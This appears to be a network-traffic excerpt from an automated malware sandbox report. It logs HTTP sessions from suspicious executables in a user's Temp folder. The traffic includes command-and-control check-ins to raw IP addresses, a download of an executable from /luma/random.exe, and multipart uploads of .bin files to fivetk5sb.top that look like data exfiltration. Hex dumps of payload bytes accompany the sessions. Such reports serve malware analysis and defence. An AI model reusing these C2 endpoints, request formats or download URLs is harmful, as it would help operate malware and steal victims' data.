                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.445235968 CET1236INData Raw: a9 d3 24 d0 ac a4 b9 b8 10 e8 a5 82 63 90 65 fa 8b 84 cd ae 5a cb ae ca e7 90 67 ed bc 43 d8 36 3a 81 8e d4 bf 6b 49 c5 e2 ae 7e 1a 82 e4 76 01 d5 03 4f e6 f3 c4 b2 85 e4 86 ae 5a a4 78 17 5f d9 7f 55 56 c7 16 9b 10 0a 39 43 0e 5c 7b ce ee 8b 79
                                                                                                                                                                                                                                                              Data Ascii: $ceZgC6:kI~vOZx_UV9C\{y.rj'9x`je~xqt EW8L: yzYyjVzF9/?G/>ojCveZ0t!~!c?<~5jeha3s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.445292950 CET1236INData Raw: ec 39 8a 25 e5 6d 7e be e7 03 fc 21 a3 f3 fe a3 59 b6 9a 01 6e 40 b4 5f 80 3b b7 62 9c 44 65 a7 69 64 5f 19 b8 a0 87 2b 4c 8d e5 d8 e7 9b 92 98 06 c8 83 0e 83 f8 c4 d6 ee 6d 1d 77 8e b8 b2 20 02 9b 03 43 ee c7 b1 f5 5c 7e ae 97 8a d7 7a d6 fd 95
                                                                                                                                                                                                                                                              Data Ascii: 9%m~!Yn@_;bDeid_+Lmw C\~zaIALUdv|rz#_,>.1eoli\o>bPVhz2#QSxDg~;5{N*Oi5&V,\ D2Dw.s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.445329905 CET1236INData Raw: a6 c4 60 80 ac 34 27 eb 51 88 e0 01 c3 c9 42 84 1c ed 8f e2 dd 6f 05 77 1d 8e 20 0f 32 20 cb 24 07 f8 2b 0c 2a c9 06 df 63 29 a7 1f 6b ef ca b7 0f 05 f5 27 b8 d1 89 7b c6 ee 1d c0 22 c3 85 24 d4 cb 4f 29 7c 9c 04 73 da f2 62 7e 69 bb 62 ff 1f fb
                                                                                                                                                                                                                                                              Data Ascii: `4'QBow 2 $+*c)k'{"$O)|sb~ib&'/$N~j>b0lN)o<coi"[e}=OXvJ &X^g.[>V^V|>A{u@#LiBClvq}[(jrkds&
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.445600033 CET1120INData Raw: ea 40 9a 23 66 97 39 40 af 90 fd 60 ef be 38 13 6d d8 88 14 2f 86 aa ac e7 64 02 c7 3b 0b 75 42 12 55 84 eb fa ce e7 fb 6e 80 45 d9 ee e4 6e 20 34 8d 80 68 72 64 93 ab 6a bb f8 57 e7 65 70 d7 c2 f8 ea 0c ff 83 53 35 d3 89 aa 1b 96 3b 2a f7 5f 0c
                                                                                                                                                                                                                                                              Data Ascii: @#f9@`8m/d;uBUnEn 4hrdjWepS5;*_(L^(dwy9gn/(N`kQ8=^vs$r'GdoGw/4lJdEre.asj2HZG`"L{Yds`.J
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.564347982 CET1236INData Raw: bb 34 7e 24 f6 b4 83 32 d5 b6 46 13 6a 7f 5e 12 60 3b 55 d2 11 40 f7 29 d1 ef 50 a1 e8 4e 47 17 9c 4c c3 93 45 40 a6 26 64 d4 8a 3b 6d 73 a6 1b 55 cc 6d 6c 92 7e 9a 77 3f 02 27 20 4e a3 bb 8e da 64 38 fd 43 39 fb 55 e9 bf 26 7a e6 e3 0f de df fd
                                                                                                                                                                                                                                                              Data Ascii: 4~$2Fj^`;U@)PNGLE@&d;msUml~w?' Nd8C9U&zo"<23Arg&J\ 4l )rdN^OQ,Jrh}rpJ0ubw\)E;bZz2\FCTFT0'liQpY'jgWXH


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              35192.168.2.449985212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.369966030 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:29.861915112 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:29 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              36192.168.2.449991212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:31.900600910 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:33.197973013 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:32 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              37192.168.2.449997185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:34.720556021 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019808001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:36.073352098 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              38192.168.2.450001212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:34.976023912 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:36.279072046 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:36 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              39192.168.2.450004185.215.113.16802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:36.310417891 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607482910 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:36 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 1845760
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:18:45 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675ae5-1c2a00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 10 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 49 00 00 04 00 00 f1 78 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gI@@Ix@T0h 1 H@.rsrc X@.idata 0Z@ *@\@ltyimmojP/^@vmbhrkovI@.taggant0I"@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607693911 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607703924 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607712984 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607723951 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607734919 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: qr"6^n
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.607747078 CET1236INData Raw: ee 50 9b ed 04 17 da 40 2d c1 96 59 12 00 eb 80 0e 8e af ee 97 55 05 08 fb a7 3c 7b 86 e5 0f d9 c5 7a 42 bb 05 58 76 aa 8b 7a 1a 6e c5 b0 5c c6 23 09 18 6f fe 6a 83 3e cc bd 03 41 3a 12 d2 71 4d ba 04 27 ea b6 af a2 d9 ee dd 8d 42 e4 fd af cc e9
                                                                                                                                                                                                                                                              Data Ascii: P@-YU<{zBXvzn\#oj>A:qM'B)2Z)DYAitC70PQ0}P=\ UNj+y?]}AnK?#"Z87xXi?3M!i'f)gIWl=Tun|$0!
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.608118057 CET1236INData Raw: 55 09 b3 52 24 12 75 2e ce 5f 19 0e 12 db bc 23 3d db 0d f5 79 cb 98 0c 8f f8 6a cc 88 d1 01 10 3e 2c 5d 8c 5a 3e f1 0c 89 db 6b db 8a 11 9c 88 1e 8e 89 3e 73 0e 43 6b 88 7e 6e aa 8b 1f 60 01 80 5b d4 19 f5 e0 cc b7 d4 ce 7f 7a de a0 1a 51 14 7d
                                                                                                                                                                                                                                                              Data Ascii: UR$u._#=yj>,]Z>k>sCk~n`[zQ}AV^q3e!"x<;/iTaZk=Af\AU#V&?*{.{<97zZZoV,8.j*4'3p4U= 2]oV6+
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.608170033 CET1236INData Raw: c2 ea 9f 3c 74 47 c9 75 21 1d 65 49 e9 63 7e 66 20 69 41 d0 23 4f c4 ba 95 32 10 20 7c 24 6a 8a 43 62 82 64 a4 68 57 2e c6 3c 40 28 ce 31 88 88 83 20 5b 4d 6b fe a2 0c fb f2 21 27 54 fd 2d 93 70 46 64 1c 2c 0e 8e 70 a3 e7 dc 4c 10 12 c6 c3 41 32
                                                                                                                                                                                                                                                              Data Ascii: <tGu!eIc~f iA#O2 |$jCbdhW.<@(1 [Mk!'T-pFd,pLA23)Gg!L/T5CFWcEar]2AK^#i1zb*g)?$h*qZ-{'B71y_()UAZ
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.608182907 CET1236INData Raw: d4 6d 12 d4 20 d6 8b 34 3c 9b 1a a1 04 1b 6e 22 bb 0f ac 26 0c ee 80 4c 7c af 1d 16 03 f5 1f 76 f9 f7 69 67 5b 28 5d 43 66 35 ed 85 ff f8 4a 7f da d8 14 78 16 2e 06 ce 6c 99 67 0e 20 fa fa b6 ad f2 13 36 8b 2b 10 37 5c 73 70 0c aa c7 18 8e 8d 23
                                                                                                                                                                                                                                                              Data Ascii: m 4<n"&L|vig[(]Cf5Jx.lg 6+7\sp# ]M,o^~`3u,-_$hTi%x1Z`Co|Fh&bp${1^9iBjN[-C)5Ztmssm\(^g1
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.727257013 CET1236INData Raw: 25 5b 03 8d 32 24 02 86 06 d1 1b 89 72 02 61 9f c1 21 d4 12 0f 0e 96 f0 12 4d 13 10 fa 1b 9e e0 f4 31 cc 3d 3c b2 40 c2 a7 77 0c 31 cc 5a 21 0d 8d 74 f6 ee 9f 6f d5 66 71 46 7c c2 bd c5 79 0d c4 1a c5 63 d6 d9 54 6f da 7a cd 5f 3e 42 a3 33 cc 1e
                                                                                                                                                                                                                                                              Data Ascii: %[2$ra!M1=<@w1Z!tofqF|ycToz_>B3)rGc59iR4f=Dr,DqqlYAF|Lfz/\J\fji2LqsD7?n0/1`F.xmOaq9&hubpP\.d(jg


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              40192.168.2.450005185.121.15.192802648C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:37.258013964 CET643OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                              Host: fivetk5sb.top
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------3Hmb0Xz54igKmXytiHgVfo
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 48 6d 62 30 58 7a 35 34 69 67 4b 6d 58 79 74 69 48 67 56 66 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 61 68 69 63 6f 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0b b3 05 ba 73 48 ad 01 6e bb fb e0 d9 b6 f5 c5 cd 81 ac 5b c2 9a 4a b9 ee dc 78 7b 01 2e cc 4a 24 16 4c 34 7e c8 8f 31 c6 5d 5e 59 25 bc f3 54 8c 89 be a4 19 75 f5 f4 a7 2c f9 34 2b e1 e4 8e 8e 0e ce ee b6 6f 2a 23 0a e1 56 45 8a 16 7a ed 43 e0 5a 3b 48 81 26 05 d1 3c ff ff db 00 24 04 07 67 ad 5f 57 c7 1b bb 86 e3 4c 83 88 5f 60 09 fa 09 17 39 a3 e9 eb 4e 21 01 be 17 45 e9 0d 70 84 a2 12 7c f7 96 31 9f 5c 1d 19 bb 79 c0 a5 08 f3 29 6a aa d4 e8 d7 42 cf f7 ab a4 7e 69 34 d0 60 8c 14 21 af 98 eb 63 37 92 13 26 2a 81 10 05 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: --------------------------3Hmb0Xz54igKmXytiHgVfoContent-Disposition: form-data; name="file"; filename="Zahicoha.bin"Content-Type: application/octet-streamsHn[Jx{.J$L4~1]^Y%Tu,4+o*#VEzCZ;H&<$g_WL_`9N!Ep|1\y)jB~i4`!c7&*g&K,7Pf`x8!xqJIr*A-?j*--------------------------3Hmb0Xz54igKmXytiHgVfo--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:38.683259964 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:38 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 2
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                              X-RateLimit-Remaining: 29
                                                                                                                                                                                                                                                              X-RateLimit-Reset: 1734832059
                                                                                                                                                                                                                                                              ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                                                                                                                              Data Ascii: OK


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              41192.168.2.450011212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:38.045597076 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:39.353915930 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:39 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              42192.168.2.450016185.121.15.192802648C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.294697046 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                              Host: fivetk5sb.top
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Content-Length: 63842
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------F6Kt4zmRl4u7Vp1IRRQ2Qm
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 36 4b 74 34 7a 6d 52 6c 34 75 37 56 70 31 49 52 52 51 32 51 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 65 64 61 62 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 11 09 f9 b5 66 22 f1 26 3a 44 bc 01 66 15 08 04 49 b6 cf 3b 1e 13 11 78 b4 c9 43 c6 6f fa cc d2 cc dc e0 4d 06 d5 b0 b2 7e ce eb 11 3c 66 b4 50 ab c6 fe ed 51 f1 1a 87 55 81 1d 74 24 07 85 6c a6 06 ff de cb 95 4a 8e 20 0f 4f 38 f9 3c ea 88 45 51 b5 53 49 49 42 7d 89 8d f3 8a 82 40 67 d4 c7 46 bb 89 52 22 06 08 2c 2f 27 fd 2d d1 cd 8d 4f 0c 28 ea e7 1f a3 e8 16 f0 9c 66 69 68 3b b6 23 ac 84 33 5d 7c 1d 72 f7 26 48 a3 90 37 05 c0 f7 32 3f 9d b0 db 0d a9 58 c0 3a f7 e1 df 60 1a 25 1f 81 e3 14 98 ec 74 19 9b ef 5d db de 38 95 ef [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: --------------------------F6Kt4zmRl4u7Vp1IRRQ2QmContent-Disposition: form-data; name="file"; filename="Nedabo.bin"Content-Type: application/octet-stream/f"&:DfI;xCoM~<fPQUt$lJ O8<EQSIIB}@gFR",/'-O(fih;#3]|r&H72?X:`%t]8okNU?|0wkDTUl,KC?^[|@d$b8[mqBOf&%&3Y "qM]/htjnddRmBJh2/LJX1M>Jl@l$)*Zrnh{6[=eF0+pG3P+L'M?Fh!CRl*\hq'E1$=WE|f,(LuAu|yb7v,$^h`HI*`T=V6+DV]8-#TY{^+;h2T):c)d5CEZEGh;l+?[n2021V#7Nj-'k[k*UCK,qxMH!;^!0aeXw"SKLzc|}\K|/kY|41 ,J*[dn5I'F6D7T<3>'x`S<vO^S [TRUNCATED]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414352894 CET2472OUTData Raw: f1 3c 0a 6a 44 e2 e2 ff 4a 7d a7 be aa 5b 26 4f 59 d2 e5 4e 66 ed f1 e7 f0 18 12 11 a9 a0 36 4d c3 a3 0b 3d 82 f5 43 24 ec c6 bd 06 47 bc 0d 6a 7a a8 8b b1 ef f1 73 17 b4 58 51 0d 0e 04 88 59 ef bb e1 e7 23 cf 7d 88 8a 0c 08 c3 b9 71 bf 79 05 f1
                                                                                                                                                                                                                                                              Data Ascii: <jDJ}[&OYNf6M=C$GjzsXQY#}qykP&mZvtdT`p'<?e=6R4<5773@H`r+eg'\2<5`k%}zL>4$e}fS\$D!K.YXwsVB~)}gDmbVVG
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414402962 CET2472OUTData Raw: c3 b5 69 30 35 f1 c8 ba 86 04 91 95 b9 e4 47 78 eb 23 72 aa b5 5d 18 68 aa 3b df 89 5a c2 55 6b 0f dd 25 f9 bc c5 5d d0 fe 80 ea 5f 5a 41 8a f3 c2 6c 84 ab f8 f9 60 16 18 df bb d2 1e 6e 17 8b 82 06 f1 f9 6d 15 a2 72 50 6e 2e c4 c2 d3 1c 36 83 d4
                                                                                                                                                                                                                                                              Data Ascii: i05Gx#r]h;ZUk%]_ZAl`nmrPn.6pKQ;)?u.,:0q_~Sb7ZK~a i ]#)b<c3Dc~>% !w+oUPQ~i<(6ioy\7rXSg
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:40.414460897 CET2472OUTData Raw: b5 08 29 fc ef 93 a7 de 9c 05 ae 67 1b b8 5c 9b 78 50 02 3d 06 b5 b9 c6 a5 10 34 53 be 21 b8 e8 31 57 40 ec 9b d1 cf b4 cc d1 e6 fe 23 40 49 25 f4 e0 b2 70 d3 f7 80 be 4d 4d f9 d3 4d a3 d4 cf 0e a7 aa 8d 96 20 70 e2 5c 8b 14 d3 e1 51 52 10 3f ee
                                                                                                                                                                                                                                                              Data Ascii: )g\xP=4S!1W@#@I%pMMM p\QR?hNDuxF|gr+)Pj@);Qi`ymq'-_YWIFOy9v<8+J+_/#3+]$^3gS`/]Bs
